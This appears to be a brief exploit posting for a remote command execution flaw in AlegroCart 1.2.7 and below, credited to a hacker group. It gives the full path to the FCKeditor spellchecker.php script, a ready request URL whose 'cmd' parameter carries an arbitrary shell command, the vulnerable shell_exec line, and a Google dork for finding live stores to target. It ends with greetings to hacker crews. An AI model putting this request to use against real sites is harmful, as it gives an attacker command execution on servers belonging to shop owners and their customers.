AlegroCart versions 1.2.7 and below suffer from a remote command execution vulnerability.
8906b8c516eca8beaffa239a56c986b687fe22e0bbea94995dd12db785b413fd
#### # Exploit Title: AlegroCart <= 1.2.7 (spellchecker.php) Remote Command Execution Vulnerability
# Author: T0x!c
# Date: 22/02/2012
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork: intext:" Powered by AlegroCart Your Store Name © 2012"
# Vendor: http://forum.alegrocart.com/viewtopic.php?f=8&t=570
# Version: 1.2.7
# Tested on: [Windows Xp]
####
# Exploit : admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
http://localhost/Path/admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?cmd=[your command]
http://127.0.0.1/Path/admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?cmd=[your command]
shell_exec( $cmd )) {
line : 102
=================================**Algerians Hackers**=======================================
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Kader11000 * Kalashinkov * Over-x
(exploit-id.com) , (1337day.com) , (h4ckforu.com) , (alboraaq.com) (Dz-Team.biz) =============================================================================================